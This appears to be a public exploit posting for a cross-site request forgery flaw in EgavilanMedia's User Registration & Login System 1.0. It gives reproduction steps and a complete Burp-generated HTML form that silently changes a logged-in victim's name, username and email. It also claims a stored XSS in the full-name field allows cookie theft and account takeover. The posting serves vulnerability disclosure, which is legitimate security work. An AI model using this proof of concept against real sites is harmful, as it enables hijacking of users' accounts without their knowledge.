EgavilanMedia User Registration And Login System With Admin Panel 1.0 CSRF

`# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF  
# Date: 01-12-2020  
# Exploit Author: Hardik Solanki  
# Vendor Homepage: http://egavilanmedia.com  
# Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php  
# Version: 1.0  
# Tested on Windows 10  
  
CSRF ATTACK:  
Cross-site request forgery (also known as CSRF) is a web security  
vulnerability that allows an attacker to induce users to perform actions  
that they do not intend to perform. It allows an attacker to partly  
circumvent the same-origin policy, which is designed to prevent different  
websites from interfering with each other.  
  
Attack Vector:  
An attacker can update any user's account. (Note: FULL NAME field is also  
vulnerable to stored XSS & attacker can steal the authenticated Session os  
the user)  
  
Steps to reproduce:  
1. Open user login page using the following URL:  
->  
http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html  
  
2. Now login with the "attacker" user account & navigate to the edit  
profile tab. Click on the "Update" button and intercept the request in web  
proxy tool called "Burpusite"  
  
3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below  
code.  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="  
http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php"  
method="POST">  
<input type="hidden" name="fullname" value="Attacker" />  
<input type="hidden" name="username" value="hunterr" />  
<input type="hidden" name="email"  
value="[email protected]" />  
<input type="hidden" name="gender" value="Male" />  
<input type="hidden" name="action" value="update_user" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
4. Now, login with the "Victim/Normal user" account. (Let that user is  
currently authenticated in the browser).  
  
5. Paste the URL in the browser, which is copied in step 3. OR submit the  
CSRF POC code, which is shown in step 3.  
  
6. We receive a "Status: Success", which indicates that the CSRF attack is  
successfully done & the Attacker can takeover the user account via Stored  
XSS (Steal the authenticated Cookies of the user from the "FULL NAME"  
parameter)  
  
IMPACT:  
An attacker can takeover any user account. (Note: FULL NAME field is also  
vulnerable to stored XSS & attacker can steal the authenticated Session os  
the user)  
`